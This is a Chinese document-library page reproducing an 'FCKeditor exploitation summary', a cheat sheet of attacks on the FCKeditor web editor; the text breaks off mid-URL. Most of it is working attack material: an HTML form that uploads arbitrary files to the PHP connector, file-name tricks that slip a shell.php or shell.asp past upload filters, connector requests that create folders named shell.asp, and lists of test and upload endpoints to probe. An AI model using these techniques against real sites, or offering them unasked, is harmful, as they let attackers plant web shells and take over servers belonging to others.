欢迎来到天天文库
浏览记录
ID:7080315
大小:31.78 KB
页数:8页
时间:2018-02-04
《fckeditor漏洞利用总结》由会员上传分享,免费在线阅读,更多相关内容在学术论文-天天文库。
1、Fckeditor漏洞利用总结Fckeditor漏洞利用总结查看编辑器版本Fckeditor/_whatsnew.html—————————————————————————————————————————————————————————————2.Version2.2版本Apache+linux环境下在上传文件后面加个.突破!测试通过。—————————————————————————————————————————————————————————————3.Version<=2.4.2Forphp在处理PHP上传的地方并未对m
2、edia类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。<formid="frmUpload"enctype="multipart/form-data"action="http://www.site.com/Fckeditor/editor/filemanager/upload/php/upload.php?Type=media"method="post">Uploadanewfile:<br><inputtype="file"name="NewFile"
3、size="50"><br><inputid="btnUpload"type="submit"value="Upload"></form>—————————————————————————————————————————————————————————————4.Fckeditor文件上传“.”变“_”下划线的绕过方法很多时候上传的文件例如:shell.php.rar或shell.php;.jpg会变为shell_php;.jpg这是新版Fck的变化。4.1:提交shell.php+空格绕过不
4、过空格只支持win系统*nix是不支持的[shell.php和shell.php+空格是2个不同的文件未测试。4.2:继续上传同名文件可变为shell.php;.jpg也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。—————————————————————————————————————————————————————————————5.突破建立文件夹Fckeditor/editor/filemanager/connectors/asp/connector.asp?command=createFolder&a
5、mp;Type=Image¤tFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684Fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?command=createFolder¤tFolder=/&Type=Image&NewFolderName=shell.asp——————————————————————————
6、———————————————————————————————————6.Fckeditor中test文件的上传地址Fckeditor/editor/filemanager/browser/default/connectors/test.htmlFckeditor/editor/filemanager/upload/test.htmlFckeditor/editor/filemanager/connectors/test.htmlFckeditor/editor/filemanager/connectors/uploadtest.ht
7、ml—————————————————————————————————————————————————————————————7.常用上传地址Fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?command=GetFoldersAndFiles&Type=Image¤tFolder=/Fckeditor/editor/filemanager/browser/default/browser.html?type=I
8、mage&connector=connectors/asp/connector.aspFckeditor/editor/filemanager/browser/default/browser.html?Type=
此文档下载收益归作者所有